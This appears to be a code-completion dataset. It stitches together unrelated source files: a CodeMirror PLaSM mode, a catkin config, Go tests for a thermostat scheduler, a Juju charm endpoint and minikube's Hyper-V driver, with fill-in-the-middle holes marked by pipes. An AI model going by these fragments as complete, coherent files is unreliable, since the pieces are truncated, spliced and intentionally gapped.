'MOVE', 'M', 'SCALE', 'S', 'ROTATERAD', 'ROTATE', 'R', 'FLIP', 'TRANSLATE', 'T', 'SHIFT', 'POSUN', 'POSUNUTI', 'PRZENIES', 'PRZESUN', 'BEWEGE', 'BEWEGEN', 'BEWEGUNG', 'VERSCHIEBUNG', 'VERSCHIEBEN', 'VERSCHIEBE', 'MOVER', 'MUEVA', 'MUEVE', 'MUOVERE', 'MUOVI', 'SPOSTARE', 'SPOSTA', 'DEPLACER', 'DEPLACE', 'SKALUJ', 'SKALOVANI', 'PRZESKALUJ', 'SKALIERE', 'SKALIEREN', 'ESCALA', 'ESCALAR', 'SCALA', 'SCALARE', 'ECHELLE', 'REDIMENSIONNER', 'RRAD', 'OTOCRAD', 'OTOCENIRAD', 'ROTACERAD', 'ROTUJRAD', 'OBROCRAD', 'DREHERAD', 'DREHENRAD', 'DREHUNGRAD', 'ROTIERERAD', 'ROTIERENRAD', 'ROTIERUNGRAD', 'GIRARAD', 'ROTARAD', 'GIRARRAD', 'ROTARRAD', 'RUOTARERAD', 'RUOTARAD', 'TOURNERRAD', 'TOURNERAD', 'ROTATEDEG', 'RDEG', 'OTOC', 'OTOCENI', 'ROTACE', 'ROTUJ', 'OBROC', 'DREHE', 'DREHEN', 'DREHUNG', 'ROTIERE', 'ROTIEREN', 'ROTIERUNG', 'GIRA', 'ROTA', 'GIRAR', 'ROTAR', 'RUOTARE', 'RUOTA', 'TOURNER', 'TOURNE'
],
[
'ERASE', 'SPLIT', 'COPY', 'WELD', 'UNION', 'STRUCT', 'INTERSECTION', 'I', 'SUBTRACT', 'DIFFERENCE', 'DIFF', 'XOR', 'JOIN', 'PRODUCT', 'POWER', 'GRID', 'TOP', 'BOTTOM', 'LEFT', 'RIGHT', 'FRONT', 'REAR', 'MAP', 'MIRROR', 'SOLIDIFY', 'EXTRUDE', 'REVOLVE', 'SPIRAL', 'E', 'KOPIE', 'KOPIA', 'COPIA', 'COPIE', 'SPOJ', 'SPOJIT', 'SPOJENI', 'STRUKTURA', 'STRUKTUR', 'VERBINDE', 'ESTRUCTURA', 'ESTRUCT', 'STRUTTURA', 'GLUE', 'U', 'SUM', 'SJEDNOCENI', 'SOUCET', 'SECTI', 'SECIST', 'SUMA', 'UNIA', 'VEREINIGE', 'VEREINIGUNG', 'SUMME', 'SOMMA', 'UNIONE', 'SOMME', 'PRUNIK', 'PRZECIECIE', 'PRZETNIJ', 'DURCHSCHNITT', 'SCHNITT', 'SCHNEIDE', 'INTERSECCION', 'INTERSEZIONE', 'INTERSECA', 'MINUS', 'ODECTI', 'ODECIST', 'ODEJMIJ', 'ABZIEHE', 'SUBTRAHIERE', 'SUSTRAER', 'SUSTRAE', 'SOTTRARRE', 'SOTTRAI', 'SOUSTRAIRE', 'SOUSTRAIS', 'D', 'ROZDIL', 'ROZNICA', 'DIFFERENZ', 'DIFERENCIA', 'DIF', 'MOCNINA', 'PRODUKT', 'SOUCIN', 'UMOCNIT', 'UMOCNI', 'MOC', 'ILOCZYN', 'LEISTUNG', 'POTENCIA', 'PRODUCTO', 'POTENZA', 'PUISSANCE', 'PRODUIT', 'QUOTE', 'SIT', 'MRIZ', 'SIATKA', 'GITTER', 'NETZ', 'REJILLA', 'CUADRICULA', 'GRIGLIA', 'GRILLE', 'EXT', 'APPEND'
],
[
'SHOW', 'SIZEX', 'SIZEY', 'SIZEZ', 'SIZE', 'MINX', 'MINY', 'MINZ', 'MAXX', 'MAXY', 'MAXZ', 'GETDIM', 'COLOR', 'C', 'MATERIAL', 'TEXTURE', 'IS2D', 'IS3D', 'EMPTYSET', 'SUBSET', 'DISJOINT', 'HASBOX2D', 'HASNTBOX2D', 'ISINBOX2D', 'HASBOX3D', 'HASNTBOX3D', 'ISINBOX3D', 'SIZETEST2D', 'SIZETEST3D', 'BBTEST2D', 'BBTEST3D', 'SIZEMATCH2D', 'SIZEMATCH3D', 'POSITIONTEST2D', 'POSITIONTEST3D', 'PRINTSIZE', 'EXTREMA', 'EXTREMS', 'EXTREMES', 'VALIDATE', 'UKAZ', 'POKAZ', 'ZEIGE', 'MOSTRA', 'MONTRE', 'MUESTRA', 'VELIKOST', 'ROZMER', 'DELKA', 'ROZMIAR', 'GROESSE', 'GROSSE', 'LAENGE', 'LANGE', 'TAMANO', 'LONGITUD', 'TAGLIA', 'LUNGHEZZA', 'TAILLE', 'LONGUEUR', 'BARVA', 'OBARVI', 'OBARVIT', 'KOLOR', 'FARBE', 'COLORE', 'COULEUR'
],
[
'MANGO', 'BLACKBERRY', 'PAPAYA', 'HONEY', 'KETCHUP', 'MUSTARD', 'GRAY', 'GREY', 'SAND', 'LIGHTGREEN', 'GREEN', 'DARKGREEN', 'BLACK', 'LIGHTBLUE', 'BLUE', 'DARKBLUE', 'LIGHTBROWN', 'BROWN', 'DARKBROWN', 'LIME', 'MAROON', 'OLIVE', 'TEAL', 'NAVY', 'NAVYBLUE', 'SKYBLUE', 'CRIMSON', 'CORAL', 'SALMON', 'KHAKI', 'TURQUOISE', 'ORCHID', 'BEIGE', 'WHEAT', 'LIGHTCYAN', 'CYAN', 'DARKCYAN', 'PINK', 'LIGHTMAGENTA', 'MAGENTA', 'DARKMAGENTA', 'ORANGE', 'DARKORANGE', 'PURPLE', 'INDIGO', 'VIOLET', 'WHITE', 'LIGHTRED', 'RED', 'DARKRED', 'YELLOW', 'DARKYELLOW', 'STRAWBERRY', 'RASPBERRY', 'BLUEBERRY', 'PEACH', 'BANANA', 'MINT', 'VANILLA', 'LEMON', 'CHOCOLATE', 'CANDY', 'BRASS', 'COPPER', 'BRONZE', 'SILVER', 'GOLD', 'WOOD', 'STEEL', 'SEDA', 'SEDIVA', 'ZELENA', 'CERNA', 'MODRA', 'HNEDA', 'ORANZOVA', 'RUZOVA', 'FIALOVA', 'BILA', 'CERVENA', 'RUDA', 'ZLUTA', 'OCEL', 'OCELOVA', 'MOSAZ', 'MOSAZNA', 'MED', 'MEDENA', 'BRONZ', 'BRONZOVA', 'STRIBRO', 'STRIBRNA', 'ZLATO', 'ZLATA', 'SZARY', 'SIWY', 'ZIELONY', 'CZARNY', 'NIEBIESKI', 'BRAZOWY', 'POMARANCZOVY', 'ROZOWY', 'PURPUROWY', 'BIALY', 'CZERWONY', 'ZOLTY', 'STAL', 'STALOWY', 'MOSIADZ', 'MIEDZ', 'BRAZ', 'SREBRO', 'SREBRNY', 'ZLOTO', 'ZLOTY', 'GRAU', 'GRUEN', 'GRUN', 'SCHWARZ', 'BLAU', 'BRAUN', 'ROSA', 'LILA', 'WEISS', 'ROT', 'GELB', 'STAHL', 'MESSING', 'KUPFER', 'SILBER', 'GRIS', 'VERDE', 'NEGRO', 'NEGRA', 'AZUL', 'MARRON', 'CIAN', 'ROSO', 'NARANJA', 'PURPURO', 'PURPURA', 'BLANCO', 'BLANCA', 'ROJO', 'ROJA', 'AMARILLO', 'AMARILLA', 'ACERO', 'LATON', 'COBRE', 'BRONCE', 'PLATA', 'ORO', 'GRIGIO', 'NERO', 'NERA', 'AZZURRO', 'AZZURRA', 'MARRONE', 'ROSOLARE', 'CIANO', 'DENTELLARE', 'ARANCIONE', 'ARANCIO', 'ARANCIA', 'VIOLA', 'PORPORA', 'BIANCO', 'BIANCA', 'ROSSO', 'ROSSA', 'GIALLO', 'GIALLA', 'ACCIAIO', 'OTTONE', 'RAME', 'BRONZO', 'ARGENTO', 'VERT', 'NOIR', 'BLEU', 'BRUN', 'ROSE', 'POURPRE', 'BLANC', 'ROUGE', 'JAUNE', 'ACIER', 'LAITON', 'CUIVRE', 'ARGENT', 'OR'
],
['X'],
['Y'],
['Z']
];
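    // Each group above is compiled into its own word regexp below and
    // returned as a distinct token type ('plasm-custom0', 'plasm-custom1',
    // ...), so a stylesheet can color shapes, transforms, boolean ops,
    // queries, colors, and axes separately.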
var py2 = {'builtins': ['apply', 'basestring', 'buffer', 'cmp', 'coerce', 'execfile',
'file', 'intern', 'long', 'raw_input', 'reduce', 'reload',
'unichr', 'unicode', 'xrange', 'False', 'True', 'None'],
'keywords': ['exec', 'print']};
var py3 = {'builtins': ['ascii', 'bytes', 'exec', 'print'],
'keywords': ['nonlocal', 'False', 'True', 'None']};
if (!!parserConf.version && parseInt(parserConf.version, 10) === 3) {
commonkeywords = commonkeywords.concat(py3.keywords);
commonBuiltins = commonBuiltins.concat(py3.builtins);
var stringPrefixes = new RegExp("^(([rb]|(br))?('{3}|\"{3}|['\"]))", "i");
} else {
commonkeywords = commonkeywords.concat(py2.keywords);
commonBuiltins = commonBuiltins.concat(py2.builtins);
var stringPrefixes = new RegExp("^(([rub]|(ur)|(br))?('{3}|\"{3}|['\"]))", "i");
}
var keywords = wordRegexp(commonkeywords);
var builtins = wordRegexp(commonBuiltins);
var customKeywords = [];
for (var i=0; i<customGroups.length; i++) {
customKeywords.push(wordRegexp(customGroups[i]));
}
var indentInfo = null;
// tokenizers
function tokenBase(stream, state) {
// Handle scope changes
if (stream.sol()) {
var scopeOffset = state.scopes[0].offset;
if (stream.eatSpace()) {
var lineOffset = stream.indentation();
if (lineOffset > scopeOffset) {
indentInfo = 'indent';
} else if (lineOffset < scopeOffset) {
indentInfo = 'dedent';
}
return null;
} else {
if (scopeOffset > 0) {
dedent(stream, state);
}
}
}
if (stream.eatSpace()) {
return null;
}
var ch = stream.peek();
// Handle Comments
if (ch === '#') {
stream.skipToEnd();
return 'comment';
}
// Handle Number Literals
if (stream.match(/^[0-9\.]/, false)) {
var floatLiteral = false;
// Floats
if (stream.match(/^\d*\.\d+(e[\+\-]?\d+)?/i)) { floatLiteral = true; }
if (stream.match(/^\d+\.\d*/)) { floatLiteral = true; }
if (stream.match(/^\.\d+/)) { floatLiteral = true; }
if (floatLiteral) {
// Float literals may be "imaginary"
stream.eat(/J/i);
return 'number';
}
// Integers
var intLiteral = false;
// Hex
if (stream.match(/^0x[0-9a-f]+/i)) { intLiteral = true; }
// Binary
if (stream.match(/^0b[01]+/i)) { intLiteral = true; }
// Octal
if (stream.match(/^0o[0-7]+/i)) { intLiteral = true; }
// Decimal
if (stream.match(/^[1-9]\d*(e[\+\-]?\d+)?/)) {
// Decimal literals may be "imaginary"
stream.eat(/J/i);
// TODO - Can you have imaginary longs?
intLiteral = true;
}
// Zero by itself with no other piece of number.
if (stream.match(/^0(?![\dx])/i)) { intLiteral = true; }
if (intLiteral) {
// Integer literals may be "long"
stream.eat(/L/i);
return 'number';
}
}
// Handle Strings
if (stream.match(stringPrefixes)) {
state.tokenize = tokenStringFactory(stream.current());
return state.tokenize(stream, state);
}
// Handle operators and Delimiters
if (stream.match(tripleDelimiters) || stream.match(doubleDelimiters)) {
return null;
}
if (stream.match(doubleOperators)
|| stream.match(singleOperators)
|| stream.match(wordOperators)) {
return 'operator';
}
if (stream.match(singleDelimiters)) {
return null;
}
if (stream.match(keywords)) {
return 'keyword';
        }
        if (stream.match(builtins)) {
return 'builtin';
}
for (var i=0; i<customKeywords.length; i++) {
if (stream.match(customKeywords[i])) {
if (stream.match(assignOperators)) {
return ERRORCLASS;
}
else {
return 'plasm-custom'+i;
}
}
}
var variable = stream.match(identifiers);
if (variable) {
if (stream.match(assignOperators)) {
if (funcIdentifiers.test(variable)){
return ERRORCLASS;
}
}
return 'variable';
}
// Handle non-detected items
stream.next();
return ERRORCLASS;
}
function tokenStringFactory(delimiter) {
while ('rub'.indexOf(delimiter.charAt(0).toLowerCase()) >= 0) {
delimiter = delimiter.substr(1);
}
var singleline = delimiter.length == 1;
var OUTCLASS = 'string';
return function tokenString(stream, state) {
while (!stream.eol()) {
stream.eatWhile(/[^'"\\]/);
if (stream.eat('\\')) {
stream.next();
if (singleline && stream.eol()) {
return OUTCLASS;
}
} else if (stream.match(delimiter)) {
state.tokenize = tokenBase;
return OUTCLASS;
} else {
stream.eat(/['"]/);
}
}
if (singleline) {
if (parserConf.singleLineStringErrors) {
return ERRORCLASS;
} else {
state.tokenize = tokenBase;
}
}
return OUTCLASS;
};
}
function indent(stream, state, type) {
type = type || 'py';
var indentUnit = 0;
if (type === 'py') {
if (state.scopes[0].type !== 'py') {
state.scopes[0].offset = stream.indentation();
return;
}
for (var i = 0; i < state.scopes.length; ++i) {
if (state.scopes[i].type === 'py') {
indentUnit = state.scopes[i].offset + conf.indentUnit;
break;
}
}
} else {
indentUnit = stream.column() + stream.current().length;
}
state.scopes.unshift({
offset: indentUnit,
type: type
});
}
function dedent(stream, state, type) {
type = type || 'py';
if (state.scopes.length == 1) return;
if (state.scopes[0].type === 'py') {
var _indent = stream.indentation();
var _indent_index = -1;
for (var i = 0; i < state.scopes.length; ++i) {
if (_indent === state.scopes[i].offset) {
_indent_index = i;
break;
}
}
if (_indent_index === -1) {
return true;
}
while (state.scopes[0].offset !== _indent) {
state.scopes.shift();
}
return false;
} else {
if (type === 'py') {
state.scopes[0].offset = stream.indentation();
return false;
} else {
if (state.scopes[0].type != type) {
return true;
}
state.scopes.shift();
return false;
}
}
}
function tokenLexer(stream, state) {
indentInfo = null;
var style = state.tokenize(stream, state);
var current = stream.current();
// Handle '.' connected identifiers
if (current === '.') {
style = stream.match(identifiers, false) ? null : ERRORCLASS;
if (style === null && state.lastToken === 'meta') {
// Apply 'meta' style to '.' connected identifiers when
// appropriate.
style = 'meta';
}
return style;
}
// Handle decorators
if (current === '@') {
return stream.match(identifiers, false) ? 'meta' : ERRORCLASS;
}
if ((style === 'variable' || style === 'builtin')
&& state.lastToken === 'meta') {
style = 'meta';
}
// Handle scope changes.
if (current === 'pass' || current === 'return') {
state.dedent += 1;
}
if (current === 'lambda') state.lambda = true;
if ((current === ':' && !state.lambda && state.scopes[0].type == 'py')
|| indentInfo === 'indent') {
indent(stream, state);
}
var delimiter_index = '[({'.indexOf(current);
if (delimiter_index !== -1) {
indent(stream, state, '])}'.slice(delimiter_index, delimiter_index+1));
}
if (indentInfo === 'dedent') {
if (dedent(stream, state)) {
return ERRORCLASS;
}
}
delimiter_index = '])}'.indexOf(current);
if (delimiter_index !== -1) {
if (dedent(stream, state, current)) {
return ERRORCLASS;
}
}
if (state.dedent > 0 && stream.eol() && state.scopes[0].type == 'py') {
if (state.scopes.length > 1) state.scopes.shift();
state.dedent -= 1;
}
return style;
}
var external = {
startState: function(basecolumn) {
return {
tokenize: tokenBase,
scopes: [{offset:basecolumn || 0, type:'py'}],
lastToken: null,
lambda: false,
dedent: 0
};
},
token: function(stream, state) {
var style = tokenLexer(stream, state);
state.lastToken = style;
            if (stream.eol() && state.lambda) {
state.lambda = false;
}
return style;
},
indent: function(state, textAfter) {
if (state.tokenize != tokenBase) {
return 0;
}
return state.scopes[0].offset;
}
};
if (parserConf.overlay != null) {
// overlay a mode over this mode
return CodeMirror.overlayMode(external, CodeMirror.getMode(conf, parserConf.overlay));
} else {
return external;
}
});
CodeMirror.defineMIME("text/x-plasm", "plasm");
external-module-id-strategy.d.ts
export declare const externalModuleIdStrategy: (moduleId: string, embedded?: string[]) => boolean;
pkg.develspace.context.pc.py
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/kalyco/mfp_workspace/src/srslib_test/include".split(';') if "/home/kalyco/mfp_workspace/src/srslib_test/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lsrslib_test".split(';') if "-lsrslib_test" != "" else []
PROJECT_NAME = "srslib_test"
PROJECT_SPACE_DIR = "/home/kalyco/mfp_workspace/devel/.private/srslib_test"
PROJECT_VERSION = "1.0.0"
|
setting_test.go
package setting
import (
"context"
"fmt"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"math"
"testing"
"thermostat/db"
"thermostat/db/mode"
"thermostat/db/zone"
"time"
)
func TestAddSetting(t *testing.T) {
t.Parallel()
ctx := context.TODO()
now := time.Now()
later := now.Add(time.Minute)
z, err := zone.New(ctx, t.Name())
require.NoError(t, err)
m, err := mode.New(ctx, z.ID, t.Name(), 60, 80, 1)
require.NoError(t, err)
s, err := New(ctx, z.ID, m.ID, DEFAULT, 1, now, later, 1, 86400)
require.NoError(t, err)
assert.Equal(t, DEFAULT, s.Priority)
assert.Equal(t, 1, s.DayOfWeek)
assert.Equal(t, now, s.StartDay)
assert.Equal(t, later, s.EndDay)
assert.Equal(t, 1, s.StartTime)
assert.Equal(t, 86400, s.EndTime)
}
func settingExists(t testing.TB, ctx context.Context, id int64) bool {
t.Helper()
row := db.DB.QueryRowContext(ctx, "select id from setting where id=?", id)
var check int
_ = row.Scan(&check)
return check != 0
}
func TestSetting_Delete(t *testing.T) {
t.Parallel()
ctx := context.TODO()
z, err := zone.New(ctx, t.Name())
require.NoError(t, err)
m, err := mode.New(ctx, z.ID, t.Name(), 70, 80, 1)
require.NoError(t, err)
s, err := New(ctx, z.ID, m.ID, SCHEDULED, 1, time.Now(), time.Now().Add(time.Minute), 0, 50)
require.NoError(t, err)
assert.True(t, settingExists(t, ctx, s.ID))
err = s.Delete(ctx)
require.NoError(t, err)
assert.False(t, settingExists(t, ctx, s.ID))
}
func TestSetting_Runtime(t *testing.T) {
t.Parallel()
now := time.Date(2019, 12, 31, 12, 12, 13, 0, time.Local) // Tuesday
tests := []struct {
name string
start, end time.Time
startTime, endTime int
dayOfWeek []time.Weekday
expected time.Time
}{
{
name: "before start date",
start: now.AddDate(0, 0, 10),
end: now.AddDate(0, 0, 11),
startTime: 0,
endTime: 86400,
dayOfWeek: []time.Weekday{time.Sunday, time.Monday, time.Tuesday, time.Wednesday, time.Thursday, time.Friday, time.Saturday},
expected: now.AddDate(0, 0, 10),
},
{
name: "after end date",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, -1),
startTime: 0,
endTime: 86400,
dayOfWeek: []time.Weekday{time.Sunday, time.Monday, time.Tuesday, time.Wednesday, time.Thursday, time.Friday, time.Saturday},
expected: time.Time{},
},
{
name: "today now",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, 10),
startTime: 0,
endTime: 86400,
dayOfWeek: []time.Weekday{time.Tuesday},
expected: now,
},
{
name: "today but later",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, 10),
startTime: 60 * 60 * 14,
endTime: 60 * 60 * 18,
dayOfWeek: []time.Weekday{time.Tuesday},
expected: time.Date(now.Year(), now.Month(), now.Day(), 14, 0, 0, 0, now.Location()),
},
{
name: "today but earlier",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, 10),
startTime: 60 * 60 * 4,
endTime: 60 * 60 * 8,
dayOfWeek: []time.Weekday{time.Tuesday},
expected: time.Date(now.Year(), now.Month(), now.Day()+7, 4, 0, 0, 0, now.Location()),
},
{
name: "tomorrow",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, 10),
startTime: 60 * 60 * 4,
endTime: 60 * 60 * 8,
dayOfWeek: []time.Weekday{time.Sunday, time.Monday, time.Wednesday, time.Thursday, time.Friday, time.Saturday},
expected: time.Date(now.Year(), now.Month(), now.Day()+1, 4, 0, 0, 0, now.Location()),
},
}
for i, tt := range tests {
t.Run(fmt.Sprintf("%d: %s", i, tt.name), func(t *testing.T) {
var dayOfWeek int
for _, d := range tt.dayOfWeek {
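				// 2 << d sets bit d+1, matching WeekdayMask (see TestWeekdayMask).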
dayOfWeek |= 2 << uint(d)
}
s := Setting{
DayOfWeek: dayOfWeek,
StartDay: tt.start,
EndDay: tt.end,
StartTime: tt.startTime,
EndTime: tt.endTime,
}
runtime := s.Runtime(now)
// strip monotonic clock readings with Round(0) so == will work
assert.Equal(t, tt.expected.Round(0), runtime.Round(0))
})
}
}
func TestOverlaps(t *testing.T) {
t.Parallel()
ctx := context.TODO()
now := time.Now()
z1, err := zone.New(ctx, t.Name()+"1")
require.NoError(t, err)
z2, err := zone.New(ctx, t.Name()+"2")
require.NoError(t, err)
m1, err := mode.New(ctx, z1.ID, t.Name()+"1", 70, 80, 1)
require.NoError(t, err)
m2, err := mode.New(ctx, z1.ID, t.Name()+"2", 71, 79, 2)
require.NoError(t, err)
m3, err := mode.New(ctx, z2.ID, t.Name()+"1", 70, 80, 1)
require.NoError(t, err)
existing, err := New(ctx, z1.ID, m1.ID, SCHEDULED, WeekdayMask(time.Monday)|WeekdayMask(time.Wednesday), now, now.Add(time.Hour*24*30), 32400, 61200) // 9 to 5 monday and wednesday for the next 30 days
require.NoError(t, err)
tests := []struct {
name string
zone zone.Zone
priority Priority
weekdays []time.Weekday
start time.Time
end time.Time
startTime int
endTime int
overlap bool
}{
		{
			name: "different zone",
zone: z2,
overlap: false,
},
{
name: "different priority",
priority: OVERRIDE,
overlap: false,
},
{
name: "span is before",
start: existing.StartDay.Add(-time.Hour * 24),
end: existing.StartDay.Add(-time.Second),
overlap: false,
},
{
name: "span is after",
start: existing.EndDay.Add(time.Second),
end: existing.EndDay.Add(time.Hour * 24),
overlap: false,
},
{
name: "different weekday",
weekdays: []time.Weekday{time.Sunday, time.Tuesday, time.Thursday, time.Friday, time.Saturday},
overlap: false,
},
{
name: "before",
startTime: 0,
endTime: existing.StartTime - 1,
overlap: false,
},
{
name: "after",
startTime: existing.EndTime + 1,
endTime: 86400,
overlap: false,
},
{
name: "overlaps start time",
startTime: 0,
endTime: existing.StartTime,
overlap: true,
},
{
name: "overlaps end time",
startTime: existing.EndTime,
endTime: 86400,
overlap: true,
},
{
name: "overlaps start span",
start: existing.StartDay.Add(-time.Hour * 24),
end: existing.StartDay,
overlap: true,
},
{
name: "overlaps end span",
start: existing.EndDay,
end: existing.EndDay.Add(time.Hour * 24),
overlap: true,
},
{
name: "covers span",
start: existing.StartDay.Add(-time.Second),
end: existing.EndDay.Add(time.Second),
overlap: true,
},
{
name: "inside span",
start: existing.StartDay.Add(time.Second),
end: existing.EndDay.Add(-time.Second),
overlap: true,
},
{
name: "covers time",
startTime: existing.StartTime - 1,
endTime: existing.EndTime + 1,
overlap: true,
},
{
name: "inside time",
startTime: existing.StartTime + 1,
endTime: existing.EndTime - 1,
overlap: true,
},
}
for i, tt := range tests {
t.Run(fmt.Sprintf("%d: %s", i, tt.name), func(t *testing.T) {
var m mode.Mode
switch tt.zone.ID {
case z2.ID:
m = m3
case z1.ID:
fallthrough
default:
m = m2
}
sched := Setting{
ZoneID: z1.ID,
ModeID: m.ID,
Priority: existing.Priority,
DayOfWeek: existing.DayOfWeek,
StartDay: existing.StartDay,
EndDay: existing.EndDay,
StartTime: existing.StartTime,
EndTime: existing.EndTime,
}
if tt.zone.ID != 0 {
sched.ZoneID = tt.zone.ID
}
if tt.priority != 0 {
sched.Priority = tt.priority
}
if tt.weekdays != nil {
sched.DayOfWeek = 0
for _, d := range tt.weekdays {
sched.DayOfWeek |= WeekdayMask(d)
}
}
if !tt.start.IsZero() {
sched.StartDay = tt.start
}
if !tt.end.IsZero() {
sched.EndDay = tt.end
}
if tt.startTime != 0 {
sched.StartTime = tt.startTime
}
if tt.endTime != 0 {
sched.EndTime = tt.endTime
}
overlap := Overlaps(sched, existing)
assert.Equal(t, tt.overlap, overlap)
})
}
}
func TestValidate(t *testing.T) {
t.Parallel()
ctx := context.TODO()
now := time.Now()
z1, err := zone.New(ctx, t.Name()+"1")
require.NoError(t, err)
m1, err := mode.New(ctx, z1.ID, t.Name()+"1", 70, 80, 1)
require.NoError(t, err)
m2, err := mode.New(ctx, z1.ID, t.Name()+"2", 71, 79, 2)
require.NoError(t, err)
existing, err := New(ctx, z1.ID, m1.ID, SCHEDULED, WeekdayMask(time.Monday)|WeekdayMask(time.Wednesday), now, now.Add(time.Hour*24*30), 32400, 61200) // 9 to 5 monday and wednesday for the next 30 days
require.NoError(t, err)
tests := []struct {
name string
weekdays []time.Weekday
start time.Time
end time.Time
startTime int
endTime int
err string
}{
{
name: "valid",
weekdays: []time.Weekday{time.Tuesday},
},
{
name: "backward span",
weekdays: []time.Weekday{time.Tuesday},
start: existing.EndDay,
end: existing.StartDay,
err: "setting start must be before setting end",
},
{
name: "backward time",
weekdays: []time.Weekday{time.Tuesday},
startTime: existing.EndTime,
endTime: existing.StartTime,
err: "setting end time must be after start time",
},
{
name: "no days",
err: "setting must be active on at least one day of the week",
},
{
name: "overlapping",
weekdays: []time.Weekday{time.Monday},
err: fmt.Sprintf("new setting overlaps with setting %d", existing.ID),
},
}
for i, tt := range tests {
t.Run(fmt.Sprintf("%d: %s", i, tt.name), func(t *testing.T) {
sched := Setting{
ZoneID: z1.ID,
ModeID: m2.ID,
Priority: existing.Priority,
StartDay: existing.StartDay,
EndDay: existing.EndDay,
StartTime: existing.StartTime,
EndTime: existing.EndTime,
}
for _, d := range tt.weekdays {
sched.DayOfWeek |= WeekdayMask(d)
}
if !tt.start.IsZero() {
sched.StartDay = tt.start
}
if !tt.end.IsZero() {
sched.EndDay = tt.end
}
if tt.startTime != 0 {
sched.StartTime = tt.startTime
}
if tt.endTime != 0 {
sched.EndTime = tt.endTime
}
err := Validate(ctx, sched)
if tt.err != "" {
assert.EqualError(t, err, tt.err)
} else {
assert.NoError(t, err)
}
})
}
}
func TestWeekdayMask(t *testing.T) {
t.Parallel()
for i := time.Sunday; i <= time.Saturday; i++ {
assert.Equal(t, int(math.Pow(2, float64(i+1))), WeekdayMask(i), "Day %s", i)
}
} | |
requires.py | from charms.reactive import Endpoint, when, set_flag, clear_flag
import charmhelpers.core.hookenv as hookenv
from charmhelpers.core.hookenv import log
class GearmanRequires(Endpoint):
@when('endpoint.{endpoint_name}.joined')
def | (self):
# if any(unit.received['port'] for unit in self.all_joined_units):
set_flag(self.expand_name('available'))
@when('endpoint.{endpoint_name}.changed')
def changed(self):
# if any(unit.received['port'] for unit in self.all_joined_units):
set_flag(self.expand_name('available'))
def address(self):
"""Get the address to access Gearman over."""
for relation in self.relations:
for unit in relation.joined_units:
log("Unit: {}".format(unit.received))
address = unit.received['ingress-address']
if address is not None:
return address
| joined |
hyperv.go | //go:build windows
// +build windows
/*
Copyright 2018 The Kubernetes Authors All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package hyperv
import (
"context"
"fmt"
"os/exec"
"strings"
"time"
"github.com/docker/machine/drivers/hyperv"
"github.com/docker/machine/libmachine/drivers"
"github.com/pkg/errors"
"k8s.io/minikube/pkg/minikube/config"
"k8s.io/minikube/pkg/minikube/download"
"k8s.io/minikube/pkg/minikube/driver"
"k8s.io/minikube/pkg/minikube/localpath"
"k8s.io/minikube/pkg/minikube/registry"
)
const (
docURL = "https://minikube.sigs.k8s.io/docs/reference/drivers/hyperv/"
defaultExternalSwitchName = "minikube"
)
func init() {
if err := registry.Register(registry.DriverDef{
Name: driver.HyperV,
Init: func() drivers.Driver { return hyperv.NewDriver("", "") },
Config: configure,
Status: status,
Default: true,
Priority: registry.Preferred,
}); err != nil {
panic(fmt.Sprintf("register: %v", err))
}
}
func configure(cfg config.ClusterConfig, n config.Node) (interface{}, error) |
func status() registry.State {
path, err := exec.LookPath("powershell")
if err != nil {
return registry.State{Error: err}
}
ctx, cancel := context.WithTimeout(context.Background(), 8*time.Second)
defer cancel()
cmd := exec.CommandContext(ctx, path, "-NoProfile", "-NonInteractive", "@(Get-Wmiobject Win32_ComputerSystem).HypervisorPresent")
out, err := cmd.CombinedOutput()
if err != nil {
errorMessage := fmt.Errorf("%s failed:\n%s", strings.Join(cmd.Args, " "), out)
fixMessage := "Start PowerShell as an Administrator"
return registry.State{Installed: false, Running: true, Error: errorMessage, Fix: fixMessage, Doc: docURL}
}
// Get-Wmiobject does not return an error code for false
if strings.TrimSpace(string(out)) != "True" {
errorMessage := fmt.Errorf("%s returned %q", strings.Join(cmd.Args, " "), out)
fixMessage := "Enable Hyper-V: Start PowerShell as Administrator, and run: 'Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All'"
return registry.State{Installed: false, Running: false, Error: errorMessage, Fix: fixMessage, Doc: docURL}
}
// Ensure user is either a Windows Administrator or a Hyper-V Administrator.
adminCheckCmd := exec.CommandContext(ctx, path, "-NoProfile", "-NonInteractive", `@([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")`)
adminCheckOut, adminCheckErr := adminCheckCmd.CombinedOutput()
if adminCheckErr != nil {
errorMessage := fmt.Errorf("%s returned %q", strings.Join(adminCheckCmd.Args, " "), adminCheckOut)
fixMessage := "Unable to determine current user's administrator privileges"
return registry.State{Installed: true, Running: false, Error: errorMessage, Fix: fixMessage}
}
hypervAdminCheckCmd := exec.CommandContext(ctx, path, "-NoProfile", "-NonInteractive", `@([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(([System.Security.Principal.SecurityIdentifier]::new("S-1-5-32-578")))`)
hypervAdminCheckOut, hypervAdminCheckErr := hypervAdminCheckCmd.CombinedOutput()
if hypervAdminCheckErr != nil {
errorMessage := fmt.Errorf("%s returned %q", strings.Join(hypervAdminCheckCmd.Args, " "), hypervAdminCheckOut)
fixMessage := "Unable to determine current user's Hyper-V administrator privileges."
return registry.State{Installed: true, Running: false, Error: errorMessage, Fix: fixMessage}
}
if (strings.TrimSpace(string(adminCheckOut)) != "True") && (strings.TrimSpace(string(hypervAdminCheckOut)) != "True") {
err := fmt.Errorf("Hyper-V requires Administrator privileges")
